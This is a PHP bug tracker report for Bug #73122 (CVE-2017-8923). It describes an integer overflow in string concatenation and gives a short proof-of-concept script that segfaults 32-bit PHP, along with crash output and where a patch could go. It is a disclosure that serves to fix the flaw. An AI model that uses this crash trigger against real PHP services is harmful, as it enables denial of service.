|  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #73122 Integer Overflow when concatenating strings
Submitted: 2016-09-20 10:06 UTC Modified: 2017-11-13 09:53 UTC
Avg. Score:3.0 ± 1.6
Reproduced:1 of 2 (50.0%)
Same Version:0 (0.0%)
Same OS:0 (0.0%)
From: tloi at fortinet dot com Assigned:
Status: Open Package: Strings related
PHP Version: master-Git-2016-09-20 (Git) OS:
Private report: No CVE-ID: 2017-8923
Have you experienced this issue?
Rate the importance of this bug to you:

 [2016-09-20 10:06 UTC] tloi at fortinet dot com
Recently I notice php has been patched several times to prevent generating negative-length string to mitigate security issue. But the concat operation can still be used to overflow the length of string.

PoC ran on 32 bit version

This can be patched by checking len in either:

ZEND_CONCAT_*() functions in Zend_vm_execute.h 
zend_string_extend() function in Zend_string.h

Test script:
ini_set('memory_limit', -1);
$a = str_repeat('a',0x7fffffff)."aa";
print strlen($a);

Expected result:
zend_throw_error(NULL, "String size overflow");

Actual result:
➜  bin ./php -v
PHP 7.2.0-dev (cli) (built: Sep 20 2016 16:41:04) ( NTS DEBUG )
Copyright (c) 1997-2016 The PHP Group
Zend Engine v3.1.0-dev, Copyright (c) 1998-2016 Zend Technologies
➜  bin ./php poc.php

on another machine with php from ubuntu's official repository:
root@ubuntu-4gb-sgp1-01:~# php -v
PHP 7.0.8-0ubuntu0.16.04.2 (cli) ( NTS )
Copyright (c) 1997-2016 The PHP Group
Zend Engine v3.0.0, Copyright (c) 1998-2016 Zend Technologies
    with Zend OPcache v7.0.8-0ubuntu0.16.04.2, Copyright (c) 1999-2016, by Zend Technologies
root@ubuntu-4gb-sgp1-01:~# php poc.php

mmap() failed: [12] Cannot allocate memory
[1]    16589 segmentation fault (core dumped)  php poc.php


Add a Patch

Pull Requests

Add a Pull Request


AllCommentsChangesGit/SVN commitsRelated reports
 [2016-09-20 16:26 UTC]
-Type: Security +Type: Bug
 [2017-11-13 09:53 UTC]
-CVE-ID: +CVE-ID: 2017-8923
 [2018-03-02 18:52 UTC] contacto at agora-security dot com
Has this issue been fixed?
I don't see any reference about it in the Changelog:
PHP Copyright © 2001-2021 The PHP Group
All rights reserved.
Last updated: Sat Jun 12 18:01:23 2021 UTC